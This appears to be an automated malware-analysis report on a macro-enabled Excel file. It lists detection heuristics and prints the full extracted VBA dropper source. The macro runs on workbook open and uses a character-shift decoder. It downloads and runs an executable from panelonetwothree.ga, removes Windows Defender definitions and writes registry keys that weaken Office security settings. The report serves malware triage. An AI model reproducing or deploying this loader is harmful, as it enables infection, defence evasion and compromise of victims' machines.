MALICIOUS
332
Risk Score
Heuristics 9
-
ClamAV: Doc.Dropper.Agent-6412232-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6412232-1
-
VBA project inside OOXML medium 5 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
Set AlWhaWu8AmxahJAs = CreateObject(zIiEvHzx0("\Xhwnuy3Xmjqq", "5")) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set AlWhaWu8AmxahJAs = CreateObject(zIiEvHzx0("\Xhwnuy3Xmjqq", "5")) -
cmd.exe reference in VBA high OLE_VBA_CMDcmd.exe reference in VBAMatched line in script
BypassWindowsDefender2 = ("cmd /c cd ""%ProgramFiles%\Windows Defender"" & MpCmdRun.exe -removedefinitions -dynamicsignatures & exit") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Private Sub Workbook_Open() -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://panelonetwothree.ga/work/3.exe In document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 12451 bytes |
SHA-256: c4e648202669c99769a5dbcc127eb43cb0f1d0b7f2b0117a254bbc1183f3e59d |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
83 of 162 identifiers look randomly generated (e.g. 'KNFX_Vriwzduh_Plfurvriw_Riilfh_4513_Srzh') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Sub asdasd()
End Sub
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
Set AlWhaWu8AmxahJAs = CreateObject(zIiEvHzx0("\Xhwnuy3Xmjqq", "5"))
Dim Al89AwnAmxahJAs1
Dim Al89AwnAmxahJAs2
Dim Al89AwnAmxahJAs3
Dim Al89AwnAmxahJAs4
Dim Al89AwnAmxahJAs5
Dim Al89AwnAmxahJAs6
Dim Al89AwnAmxahJAs7
Dim Al89AwnAmxahJAs8
Dim Al89AwnAmxahJAs9
Dim Al89AwnAmxahJAs010
Dim Al89AwnAmxahJAs011
Dim Al89AwnAmxahJAs012
Dim Al89AwnAmxahJAs013
Dim Al89AwnAmxahJAs014
Al89AwnAmxahJAs1 = zIiEvHzx0("Ts{ivWlip", "4")
Al89AwnAmxahJAs2 = zIiEvHzx0("o#+Qhz0Re", "3")
Al89AwnAmxahJAs3 = zIiEvHzx0("pkiz&Y yz", "6")
Al89AwnAmxahJAs4 = zIiEvHzx0("mu6Vm|6_m", "8")
Al89AwnAmxahJAs5 = zIiEvHzx0("eFolhqw,1", "3")
Al89AwnAmxahJAs6 = zIiEvHzx0("GrzqordgI", "3")
Al89AwnAmxahJAs7 = "ile('http://panelonetwothree.ga/work/3.exe',"
Al89AwnAmxahJAs8 = zIiEvHzx0("0.Y~kurl.e|", "9")
Al89AwnAmxahJAs9 = zIiEvHzx0("{hmtxy873", "5")
Al89AwnAmxahJAs010 = zIiEvHzx0("l l.0BZ", "7")
Al89AwnAmxahJAs011 = zIiEvHzx0("}j{}6Y{", "9")
Al89AwnAmxahJAs012 = zIiEvHzx0("rfhvv#*(", "3")
Al89AwnAmxahJAs013 = zIiEvHzx0("Sxeolf(_vy", "3")
Al89AwnAmxahJAs014 = zIiEvHzx0("glswx762i|i+", "4")
Al89AwnAmxahJAs20 = Al89AwnAmxahJAs1 + Al89AwnAmxahJAs2 + Al89AwnAmxahJAs3 + Al89AwnAmxahJAs4 + Al89AwnAmxahJAs5 + Al89AwnAmxahJAs6 + Al89AwnAmxahJAs7 + Al89AwnAmxahJAs8 + Al89AwnAmxahJAs9 + Al89AwnAmxahJAs010 + Al89AwnAmxahJAs011 + Al89AwnAmxahJAs012 + Al89AwnAmxahJAs013 + Al89AwnAmxahJAs014
AlWhaWu8AmxahJAs.Run Al89AwnAmxahJAs20, vbHide
Set tskkill = CreateObject(zIiEvHzx0("\Xhwnuy3Xmjqq", "5"))
Dim STArTkwZkill
STArTkwZkill = zIiEvHzx0("dne!0d!ubtlljmm!0g!0jn!xjoxpse/fyf!'!fyju!", "1")
tskkill.Run STArTkwZkill, vbHide
Set tskkillword = CreateObject(zIiEvHzx0("\Xhwnuy3Xmjqq", "5"))
Dim STArTkwZkillword
STArTkwZkillword = zIiEvHzx0("Wv~lyzolss'4^pukv~Z{€sl'Opkklu'{hzrrpss'6m'6pt'L jls5l l", "7")
tskkillword.Run STArTkwZkillword, vbHide
Set BypassWindows = CreateObject(zIiEvHzx0("\Xhwnuy3Xmjqq", "5"))
Dim BypassWindowsDefender
BypassWindowsDefender = zIiEvHzx0("gqh$3g$tmrk$1r$7$psgeplswx$*$mtgsrjmk3vipiewi$*$mtgsrjmk3vipiewi$*$mtgsrjmk3vipiewi$*$tmrk$1r$7$psgeplswx$*$tmrk$1r$7$psgeplswx$*$i|mx", "4")
Set BypassWindows2 = CreateObject(zIiEvHzx0("\Xhwnuy3Xmjqq", "5"))
Dim BypassWindowsDefender2
BypassWindowsDefender2 = ("cmd /c cd ""%ProgramFiles%\Windows Defender"" & MpCmdRun.exe -removedefinitions -dynamicsignatures & exit")
BypassWindows2.Run BypassWindowsDefender2, vbHide
Set wso = CreateObject(zIiEvHzx0("\Xhwnuy3Xmjqq", "5"))
wso.RegWrite zIiEvHzx0("JMEW^Uqhvyctg^Oketquqhv^Qhhkeg^3302^Yqtf^Ugewtkv{^XDCYctpkpiu", "2"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("NQI[bYulz}gxkbSoixuyulzbUlloikb7846b]uxjbYki{xoz b\HG]gxtotmy", "6"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("NQI[bYulz}gxkbSoixuyulzbUlloikb7:46b]uxjbYki{xoz b\HG]gxtotmy", "6"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("JMEW^Uqhvyctg^Oketquqhv^Qhhkeg^3702^Yqtf^Ugewtkv{^XDCYctpkpiu", "2"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("NQI[bYulz}gxkbSoixuyulzbUlloikb7<46b]uxjbYki{xoz b\HG]gxtotmy", "6"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("QTL^e\xo}€j{neVrl{x|xo}eXoorlne::79eYx€n{Yxrw}e\nl~{r}‚e_KJ`j{wrwp|", "9"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("QTL^e\xo}€j{neVrl{x|xo}eXoorlne:;79eYx€n{Yxrw}e\nl~{r}‚e_KJ`j{wrwp|", "9"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("KNFX_Vriwzduh_Plfurvriw_Riilfh_4713_SrzhuSrlqw_Vhfxulw|_YEDZduqlqjv", "3"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("ILDV]Tpguxbsf]Njdsptpgu]Pggjdf]26/1]QpxfsQpjou]Tfdvsjuz]WCBXbsojoht", "1"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("JMEW^Uqhvyctg^Oketquqhv^Qhhkeg^3802^RqygtRqkpv^Ugewtkv{^XDCYctpkpiu", "2"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("ILDV]Tpguxbsf]Njdsptpgu]Pggjdf]22/1]Fydfm]Tfdvsjuz]WCBXbsojoht", "1"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("JMEW^Uqhvyctg^Oketquqhv^Qhhkeg^3402^Gzegn^Ugewtkv{^XDCYctpkpiu", "2"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("PSK]d[wn| izmdUqkzw{wn|dWnnqkmd9<68dM€kmtd[mk}zq|�d^JI_izvqvo{", "8"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("ORJ\cZvm{~hylcTpjyvzvm{cVmmpjlc8<57cL jlscZlj|yp{€c]IH^hyupunz", "7"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("LOGY`Wsjx{evi`Qmgvswsjx`Sjjmgi`5:24`I|gip`Wigyvmx}`ZFE[evrmrkw", "4"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("ILDV]Tpguxbsf]Njdsptpgu]Pggjdf]22/1]Xpse]Tfdvsjuz]QspufdufeWjfx]EjtbcmfJoufsofuGjmftJoQW", "1"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("ORJ\cZvm{~hylcTpjyvzvm{cVmmpjlc8857c^vykcZlj|yp{€cWyv{lj{lk]pl~cKpzhislH{{hjoltlu{zPuW]", "7"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("ILDV]Tpguxbsf]Njdsptpgu]Pggjdf]22/1]Xpse]Tfdvsjuz]QspufdufeWjfx]EjtbcmfVotbgfMpdbujpotJoQW", "1"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("PSK]d[wn| izmdUqkzw{wn|dWnnqkmd9968dXw mzXwqv|d[mk}zq|�dXzw|mk|ml^qm dLq{ijtmQv|mzvm|Nqtm{QvX^", "8"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("QTL^e\xo}€j{neVrl{x|xo}eXoorlne::79eYx€n{Yxrw}e\nl~{r}‚eY{x}nl}nm_rn€eMr|jkunJ}}jlqnvnw}|RwY_", "9"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("KNFX_Vriwzduh_Plfurvriw_Riilfh_4413_SrzhuSrlqw_Vhfxulw|_SurwhfwhgYlhz_GlvdeohXqvdihOrfdwlrqvLqSY", "3"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("KNFX_Vriwzduh_Plfurvriw_Riilfh_4413_H{fho_Vhfxulw|_SurwhfwhgYlhz_GlvdeohLqwhuqhwIlohvLqSY", "3"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("LOGY`Wsjx{evi`Qmgvswsjx`Sjjmgi`5524`I|gip`Wigyvmx}`TvsxigxihZmi{`HmwefpiExxegliqirxwMrTZ", "4"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("ORJ\cZvm{~hylcTpjyvzvm{cVmmpjlc8857cL jlscZlj|yp{€cWyv{lj{lk]pl~cKpzhisl\uzhmlSvjh{pvuzPuW]", "7"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("MPHZaXtky|fwjaRnhwtxtkyaTkknhja6735a\twiaXjhzwny~aUwtyjhyji[nj|aInxfgqjNsyjwsjyKnqjxNsU[", "5"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("NQI[bYulz}gxkbSoixuyulzbUlloikb7846b]uxjbYki{xoz bVxuzkizkj\ok}bJoyghrkGzzginksktzyOtV\", "6"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("MPHZaXtky|fwjaRnhwtxtkyaTkknhja6735a\twiaXjhzwny~aUwtyjhyji[nj|aInxfgqjZsxfkjQthfyntsxNsU[", "5"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("ORJ\cZvm{~hylcTpjyvzvm{cVmmpjlc8957cWv~lyWvpu{cZlj|yp{€cWyv{lj{lk]pl~cKpzhislPu{lyul{MpslzPuW]", "7"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("KNFX_Vriwzduh_Plfurvriw_Riilfh_4513_SrzhuSrlqw_Vhfxulw|_SurwhfwhgYlhz_GlvdeohDwwdfkhphqwvLqSY", "3"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("LOGY`Wsjx{evi`Qmgvswsjx`Sjjmgi`5624`Ts{ivTsmrx`Wigyvmx}`TvsxigxihZmi{`HmwefpiYrwejiPsgexmsrwMrTZ", "4"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("ILDV]Tpguxbsf]Njdsptpgu]Pggjdf]23/1]Fydfm]Tfdvsjuz]QspufdufeWjfx]EjtbcmfJoufsofuGjmftJoQW", "1"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("MPHZaXtky|fwjaRnhwtxtkyaTkknhja6735aJ}hjqaXjhzwny~aUwtyjhyji[nj|aInxfgqjFyyfhmjrjsyxNsU[", "5"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("QTL^e\xo}€j{neVrl{x|xo}eXoorlne:;79eN�lnue\nl~{r}‚eY{x}nl}nm_rn€eMr|jkun^w|jonUxlj}rxw|RwY_", "9"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("ILDV]Tpguxbsf]Njdsptpgu]Pggjdf]25/1]Xpse]Tfdvsjuz]QspufdufeWjfx]EjtbcmfJoufsofuGjmftJoQW", "1"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("PSK]d[wn| izmdUqkzw{wn|dWnnqkmd9<68d_wzld[mk}zq|�dXzw|mk|ml^qm dLq{ijtmI||ikpmumv|{QvX^", "8"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("ORJ\cZvm{~hylcTpjyvzvm{cVmmpjlc8;57c^vykcZlj|yp{€cWyv{lj{lk]pl~cKpzhisl\uzhmlSvjh{pvuzPuW]", "7"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("JMEW^Uqhvyctg^Oketquqhv^Qhhkeg^3602^RqygtRqkpv^Ugewtkv{^RtqvgevgfXkgy^FkucdngKpvgtpgvHknguKpRX", "2"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("KNFX_Vriwzduh_Plfurvriw_Riilfh_4713_SrzhuSrlqw_Vhfxulw|_SurwhfwhgYlhz_GlvdeohDwwdfkhphqwvLqSY", "3"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("JMEW^Uqhvyctg^Oketquqhv^Qhhkeg^3602^RqygtRqkpv^Ugewtkv{^RtqvgevgfXkgy^FkucdngWpuchgNqecvkqpuKpRX", "2"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("JMEW^Uqhvyctg^Oketquqhv^Qhhkeg^3602^Gzegn^Ugewtkv{^RtqvgevgfXkgy^FkucdngKpvgtpgvHknguKpRX", "2"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("NQI[bYulz}gxkbSoixuyulzbUlloikb7:46bK~ikrbYki{xoz bVxuzkizkj\ok}bJoyghrkGzzginksktzyOtV\", "6"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("KNFX_Vriwzduh_Plfurvriw_Riilfh_4713_H{fho_Vhfxulw|_SurwhfwhgYlhz_GlvdeohXqvdihOrfdwlrqvLqSY", "3"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("ORJ\cZvm{~hylcTpjyvzvm{cVmmpjlc8<57c^vykcZlj|yp{€cWyv{lj{lk]pl~cKpzhislPu{lyul{MpslzPuW]", "7"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("PSK]d[wn| izmdUqkzw{wn|dWnnqkmd9=68d_wzld[mk}zq|�dXzw|mk|ml^qm dLq{ijtmI||ikpmumv|{QvX^", "8"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("ILDV]Tpguxbsf]Njdsptpgu]Pggjdf]26/1]Xpse]Tfdvsjuz]QspufdufeWjfx]EjtbcmfVotbgfMpdbujpotJoQW", "1"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("NQI[bYulz}gxkbSoixuyulzbUlloikb7;46bVu}kxVuotzbYki{xoz bVxuzkizkj\ok}bJoyghrkOtzkxtkzLorkyOtV\", "6"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("NQI[bYulz}gxkbSoixuyulzbUlloikb7;46bVu}kxVuotzbYki{xoz bVxuzkizkj\ok}bJoyghrkGzzginksktzyOtV\", "6"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("NQI[bYulz}gxkbSoixuyulzbUlloikb7;46bVu}kxVuotzbYki{xoz bVxuzkizkj\ok}bJoyghrk[tyglkRuigzoutyOtV\", "6"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("JMEW^Uqhvyctg^Oketquqhv^Qhhkeg^3702^Gzegn^Ugewtkv{^RtqvgevgfXkgy^FkucdngKpvgtpgvHknguKpRX", "2"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("ILDV]Tpguxbsf]Njdsptpgu]Pggjdf]26/1]Fydfm]Tfdvsjuz]QspufdufeWjfx]EjtbcmfBuubdifnfoutJoQW", "1"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("LOGY`Wsjx{evi`Qmgvswsjx`Sjjmgi`5924`I|gip`Wigyvmx}`TvsxigxihZmi{`HmwefpiYrwejiPsgexmsrwMrTZ", "4"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("KNFX_Vriwzduh_Plfurvriw_Riilfh_4913_Zrug_Vhfxulw|_SurwhfwhgYlhz_GlvdeohLqwhuqhwIlohvLqSY", "3"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("LOGY`Wsjx{evi`Qmgvswsjx`Sjjmgi`5:24`[svh`Wigyvmx}`TvsxigxihZmi{`HmwefpiExxegliqirxwMrTZ", "4"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("PSK]d[wn| izmdUqkzw{wn|dWnnqkmd9>68d_wzld[mk}zq|�dXzw|mk|ml^qm dLq{ijtm]v{inmTwki|qwv{QvX^", "8"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("LOGY`Wsjx{evi`Qmgvswsjx`Sjjmgi`5:24`Ts{ivTsmrx`Wigyvmx}`TvsxigxihZmi{`HmwefpiMrxivrixJmpiwMrTZ", "4"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("NQI[bYulz}gxkbSoixuyulzbUlloikb7<46bVu}kxVuotzbYki{xoz bVxuzkizkj\ok}bJoyghrkGzzginksktzyOtV\", "6"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("PSK]d[wn| izmdUqkzw{wn|dWnnqkmd9>68dXw mzXwqv|d[mk}zq|�dXzw|mk|ml^qm dLq{ijtm]v{inmTwki|qwv{QvX^", "8"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("KNFX_Vriwzduh_Plfurvriw_Riilfh_4913_H{fho_Vhfxulw|_SurwhfwhgYlhz_GlvdeohLqwhuqhwIlohvLqSY", "3"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("ORJ\cZvm{~hylcTpjyvzvm{cVmmpjlc8=57cL jlscZlj|yp{€cWyv{lj{lk]pl~cKpzhislH{{hjoltlu{zPuW]", "7"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("MPHZaXtky|fwjaRnhwtxtkyaTkknhja6;35aJ}hjqaXjhzwny~aUwtyjhyji[nj|aInxfgqjZsxfkjQthfyntsxNsU[", "5"), 1, zIiEvHzx0("SFH`EXPSE", "1")
End Sub
Public Function zIiEvHzx0(KJDd77SzX As String, kaLvjMVfL As Integer)
Dim ZNSffcTRJ As Integer
For ZNSffcTRJ = 1 To Len(KJDd77SzX)
Mid(KJDd77SzX, ZNSffcTRJ, 1) = Chr(Asc(Mid(KJDd77SzX, ZNSffcTRJ, 1)) - kaLvjMVfL)
Next ZNSffcTRJ
zIiEvHzx0 = KJDd77SzX
End Function
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 31232 bytes |
SHA-256: 4f6a2986555fd5e413940c10827215e02e1da34afff2d2f82c1807e1649cc898 |
|||
|
Detection
ClamAV:
Doc.Dropper.Agent-6412232-1
Obfuscation or payload:
likely
176 of 343 identifiers look randomly generated (e.g. 'KNFX_Vriwzduh_Plfurvriw_Riilfh_4413_Srzh') — consistent with name-mangling obfuscation.
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.